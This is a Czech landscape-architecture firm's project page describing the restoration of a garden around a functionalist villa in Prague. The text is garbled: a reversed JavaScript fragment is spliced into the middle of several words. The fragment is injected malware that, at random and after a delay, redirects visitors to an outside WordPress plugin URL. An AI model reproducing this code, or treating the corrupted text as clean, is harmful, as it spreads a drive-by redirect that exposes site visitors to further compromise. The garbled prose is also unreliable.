Galerie projektu

Zahrada Vily na Marně

Vila na Marně je náš srdcový projekt, na kterém jsme se podílely, tak říkajíc, od začátku tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}do konce. V zimních měsících byl vytvořen v teple ateliéru návrh, který jsem pak během jara 2017 přenesly tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}do reálného měřítka. Cílem návrhu bylo „oprášení“ poněkud zanedbané zahrady obklopující funkcionalistickou stavbu v jedné z nejkrásnějších vilových čtvrtí Prahy a navrácení její reprezentační, relaxační a společenské funkce.

Zahrada byla očištěna od starých výsadeb, které bránily tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dostatečnému proslunění interiéru butog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dovy stejně jako větší částí zahrady. Byla obnovena cestní síť, která vytvořila korzo kolem celého objektu. Vnitřní prostor tohoto okruhu určený k pobytu má formální charakter. Je tvořen především travnatou plochou a pravidelnými trvalkovými záhony, které se nacházejí v těsné blízkosti butog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dovy. Vnější část prstence je naopak tvořena nepravidelnými trvalkovými podrosty, které butog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dou svou divokou formou protikladem pravidelné formální úpravě středu.

Dominantními objekty se pak staly vodní prvek, který vznikl na půtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dorysu původního bazénu a opět tak vnesl tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}do zahrady vodní element a pergola s treláží, které byly nově vytvořeny v jeho blízkosti. Tyto objekty tak nabízejí zázemí pro pořádání společenských akcí v prostoru této nádherné zahrady.

  • Rozloha: 1250 m2
  • Stav projektu: po realizaci, v údržbě

Naše projekty

{{project.title}}

{{project.location}}

Nahrávam

Přehled všech projektů


Kontaktujte nás

V případě, že máte dotazy, potřebujete konzultovat svůj záměr, nebo chcete usměrnit svou představu, neváhejte se na nás obrátit. Jsme připraveni se s Vámi podelit o naše nápady a zkušenosti. Anebo nám napište jen tak.

Napište nám